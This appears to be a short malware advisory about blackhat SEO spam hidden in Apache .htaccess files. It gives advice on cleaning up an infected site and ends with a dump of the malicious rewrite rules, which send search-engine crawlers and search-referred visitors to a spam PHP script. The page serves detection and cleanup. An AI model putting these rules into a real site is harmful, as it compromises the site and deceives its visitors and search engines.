Blackhat SEO, or spam-seo, is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is based on .htaccess rules, thus intended for server-side use and the payload is executed directly on the server, before the site is rendered. Only the payload result (spam content, redirect) is visible in the browser, not the malicious code itself.
Malicious crafted .htaccess rules which causes redirection of the visitor to other websites with spam or malicious content. Redirections are often conditional, being triggered based on user-agent, referrers and IP addresses.




This malicious code affects any vulnerable or compromised website that is running on web servers running the Apache Web Server software.


In order to remove the malicious code from the site, search your files for the strings contained in the dump or unusual code.
It is also recommended that you maintain periodic backups to restore compromised files in case of infection.


RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ counting-darline.php?$1 [L]